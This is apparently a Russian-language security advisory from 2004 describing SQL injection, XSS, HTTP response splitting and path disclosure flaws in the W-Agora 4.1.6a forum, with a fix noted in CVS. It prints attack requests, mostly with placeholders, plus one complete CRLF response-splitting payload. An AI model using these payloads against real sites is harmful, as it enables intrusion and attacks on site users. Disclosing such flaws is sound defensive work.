Security Lab

Несколько уязвимостей в W-Agora

Дата публикации:03.10.2004
Дата изменения:27.03.2006
Всего просмотров:1531
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2004-1562
CVE-2004-1563
CVE-2004-1564
CVE-2004-1565
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: W-Agora 4.x
Уязвимые версии: W-Agora 4.1.6a

Описание: Несколько уязвимостей обнаружено в W-Agora. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS и HTTP response splitting нападение. Удаленный пользователь может определить инсталляционный путь.

1. SQL injection

redir_url.php?bn=demos_links&key=[SQL]
 
2. XSS in GET:
download_thread.php?site=support&bn=support_install&thread=[XSS
 code here]
 
3. XSS in POST:
 
 POST /login.php HTTP/1.1
 Host: w-agora
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 89
 loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1
 
  
POST /forgot_password.php HTTP/1.1
 Host: w-agora
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 48
 go=1&userid=[XSS code here]
 
4. HTTP response splitting
/subscribe_thread.php?site=support&bn=support_in
 
stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte
nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan
ned%20by%20PTsecurity%3c/html%3e%0d%0a
5. Раскрытие пути
/list.php?bn=support_install&last=19&collapse=|id|
Данные уязвимости были обнаружены в результате автоматической проверки Web приложений сканером безопасности Xspider.

URL производителя:http://www.w-agora.net/

Решение:Уязвимость устранена в CVS

Ссылки: [Full-Disclosure] Multiple vulnerabilities in w-agora forum